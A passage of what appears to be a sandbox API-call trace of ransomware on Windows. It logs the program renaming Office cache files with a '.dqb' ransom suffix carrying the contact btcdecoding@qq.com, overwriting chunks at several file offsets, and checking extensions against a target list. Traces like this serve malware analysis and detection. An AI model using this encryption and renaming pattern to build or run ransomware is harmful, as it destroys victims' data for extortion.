users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.831] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0037.832] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0037.832] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0037.832] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.832] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.836] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.836] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.845] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.845] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.845] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.328] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.328] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0038.344] SetEndOfFile (hFile=0x17c) returned 1 [0038.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fea4f0 [0038.348] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0038.348] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.349] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0038.350] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.355] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0038.355] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.358] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0038.358] CloseHandle (hObject=0x17c) returned 1 [0038.722] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0038.722] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.722] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.722] lstrlenW (lpString=".doc") returned 4 [0038.722] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0038.722] lstrlenW (lpString=".docx") returned 5 [0038.722] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0038.722] lstrlenW (lpString=".pdf") returned 4 [0038.722] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0038.722] lstrlenW (lpString=".xls") returned 4 [0038.722] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0038.722] lstrlenW (lpString=".xlsx") returned 5 [0038.722] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0038.722] lstrlenW (lpString=".ppt") returned 4 [0038.722] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0038.722] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.722] lstrlenW (lpString=".zip") returned 4 [0038.722] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0038.722] lstrlenW (lpString=".rar") returned 4 [0038.722] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0038.722] lstrlenW (lpString=".bz2") returned 4 [0038.722] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0038.723] lstrlenW (lpString=".7z") returned 3 [0038.723] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0038.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.723] lstrlenW (lpString=".dbf") returned 4 [0038.723] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0038.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.723] lstrlenW (lpString=".1cd") returned 4 [0038.723] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0038.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.723] lstrlenW (lpString=".jpg") returned 4 [0038.723] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0038.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.723] lstrlenW (lpString=".doc") returned 4 [0038.723] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0038.723] lstrlenW (lpString=".docx") returned 5 [0038.723] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0038.723] lstrlenW (lpString=".pdf") returned 4 [0038.723] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0038.723] lstrlenW (lpString=".xls") returned 4 [0038.723] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0038.723] lstrlenW (lpString=".xlsx") returned 5 [0038.723] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0038.723] lstrlenW (lpString=".ppt") returned 4 [0038.723] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0038.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.723] lstrlenW (lpString=".zip") returned 4 [0038.723] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0038.723] lstrlenW (lpString=".rar") returned 4 [0038.723] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0038.723] lstrlenW (lpString=".bz2") returned 4 [0038.723] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0038.723] lstrlenW (lpString=".7z") returned 3 [0038.723] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0038.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.724] lstrlenW (lpString=".dbf") returned 4 [0038.724] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0038.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.724] lstrlenW (lpString=".1cd") returned 4 [0038.724] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0038.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0038.724] lstrlenW (lpString=".jpg") returned 4 [0038.724] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0038.724] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0038.724] lstrlenW (lpString="Proof.cab") returned 9 [0038.724] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.834] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=13642474) returned 1 [0038.834] CloseHandle (hObject=0x17c) returned 1 [0038.835] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020 [0038.835] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.835] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0038.865] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.865] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0038.866] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0038.866] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.879] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0038.879] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.885] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0038.885] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0038.885] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.902] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.902] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0038.913] SetEndOfFile (hFile=0x17c) returned 1 [0038.914] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fea4f0 [0038.914] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0039.196] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.230] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0039.230] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.233] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0039.233] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.235] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0039.237] CloseHandle (hObject=0x17c) returned 1 [0041.509] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0041.509] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.509] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.509] lstrlenW (lpString=".doc") returned 4 [0041.509] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.509] lstrlenW (lpString=".docx") returned 5 [0041.509] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0041.509] lstrlenW (lpString=".pdf") returned 4 [0041.509] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.509] lstrlenW (lpString=".xls") returned 4 [0041.509] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString=".xlsx") returned 5 [0041.510] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0041.510] lstrlenW (lpString=".ppt") returned 4 [0041.510] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.510] lstrlenW (lpString=".zip") returned 4 [0041.510] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString=".rar") returned 4 [0041.510] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString=".bz2") returned 4 [0041.510] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.510] lstrlenW (lpString=".7z") returned 3 [0041.510] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.510] lstrlenW (lpString=".dbf") returned 4 [0041.510] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.510] lstrlenW (lpString=".1cd") returned 4 [0041.510] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.510] lstrlenW (lpString=".jpg") returned 4 [0041.510] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.510] lstrlenW (lpString=".doc") returned 4 [0041.510] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString=".docx") returned 5 [0041.510] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0041.510] lstrlenW (lpString=".pdf") returned 4 [0041.510] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString=".xls") returned 4 [0041.510] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString=".xlsx") returned 5 [0041.510] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0041.510] lstrlenW (lpString=".ppt") returned 4 [0041.510] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.511] lstrlenW (lpString=".zip") returned 4 [0041.511] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.511] lstrlenW (lpString=".rar") returned 4 [0041.511] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.511] lstrlenW (lpString=".bz2") returned 4 [0041.511] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.511] lstrlenW (lpString=".7z") returned 3 [0041.511] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.511] lstrlenW (lpString=".dbf") returned 4 [0041.511] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.511] lstrlenW (lpString=".1cd") returned 4 [0041.511] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.511] lstrlenW (lpString=".jpg") returned 4 [0041.511] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.511] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0041.511] lstrlenW (lpString="InfoPathMUI.msi") returned 15 [0041.511] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0041.511] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3124224) returned 1 [0041.511] CloseHandle (hObject=0x17c) returned 1 [0041.511] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020 [0041.511] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.512] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0041.512] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0041.512] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0041.512] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.512] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.662] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.662] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.674] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.674] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.674] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.688] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.688] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc010a, lpOverlapped=0x0) returned 1 [0041.989] SetEndOfFile (hFile=0x17c) returned 1 [0041.989] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x400a4f0 [0041.989] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.990] WriteFile (in: hFile=0x17c, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.991] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.991] WriteFile (in: hFile=0x17c, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.996] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.996] WriteFile (in: hFile=0x17c, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, 